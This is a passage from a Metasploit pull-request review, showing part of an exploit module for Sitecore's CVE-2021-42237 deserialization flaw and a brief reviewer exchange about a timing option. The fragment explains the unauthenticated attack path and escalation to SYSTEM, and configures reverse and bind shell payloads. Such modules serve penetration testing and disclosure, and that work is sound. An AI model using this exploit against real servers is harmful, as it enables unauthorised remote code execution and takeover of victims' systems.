modules/exploits/windows/http/cve_2021_42237.rb

```diff
@@ -0,0 +1,216 @@
+          under the Sitecore.sitecore.shell.ClientBin.Reporting.Report defintion, having a ProcessRequest()
+          handler that calls ProcessReport() with the context of the attacker's request without properly
+          checking if the attacker is authenticated or not.
+
+          This request then causes ReportDataSerializer.DeserializeQuery() to be called, which will
+          end up calling the DeserializeParameters() function of
+          Sitecore.Analytics.Reporting.ReportDataSerializer, if a "parameters" XML tag is found in
+          the attacker's request.
+
+          Then for each subelement named "parameter", the code will check that it has a name and
+          if it does, it will call NetDataContractSerializer().ReadObject on it. NetDataContractSerializer is
+          vulnerable to deserialization attacks and can be trivially exploited by using the
+          TypeConfuseDelegate gadget chain.
+
+          By exploiting this vulnerability, an attacker can gain arbitrary code execution as the user
+          that IIS is running as, aka NT AUTHORITY\NETWORK SERVICE. Users can then use technique 4
+          of the "getsystem" command to use RPCSS impersonation and get SYSTEM level code execution.
+        },
+        'Author' => [
+          'AssetNote', # Discovery and exploit
+          'gwillcox-r7' # Module
+        ],
+        'References' => [
+          ['CVE', '2021-42237'],
+          ['URL', 'https://blog.assetnote.io/2021/11/02/sitecore-rce/'],
+          ['URL', 'https://support.sitecore.com/kb?id=kb_article_view&sysparm_article=KB1000776'],
+        ],
+        'DisclosureDate' => '2021-11-02',
+        'License' => MSF_LICENSE,
+        'Platform' => 'win',
+        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
+        'Privileged' => true,
+        'Targets' => [
+          [
+            'Windows Command',
+            {
+              'Arch' => ARCH_CMD,
+              'Type' => :win_cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/windows/powershell_bind_tcp'
+              }
+            }
+          ],
+          [
+            'Windows Dropper',
+            {
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'Type' => :win_dropper,
+              'CmdStagerFlavor' => :certutil,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'
+              }
+            }
+          ],
+          [
+            'PowerShell Stager',
+            {
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'Type' => :psh_stager,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'
+              }
+            }
+          ]
+        ],
+        'DefaultTarget' => 2,
+        'DefaultOptions' => {
+          'WfsDelay' => 30 # It can take a few seconds for reverse shells to trigger. Bind shells should be pretty quick.
```

Comment:
Was this the solution to your problem yesterday??

Reply:
Nope, thats still an issue. This is more just to allow a bit of time for connections to occur however it can likely be removed.

Reply:
Fine to leave it if it helps.

Reply:
Removed the WfsDelay option in https://github.com/rapid7/metasploit-framework/pull/15858/commits/be4fa90f1aab0ef38ab1ca21cd02754be6940a5c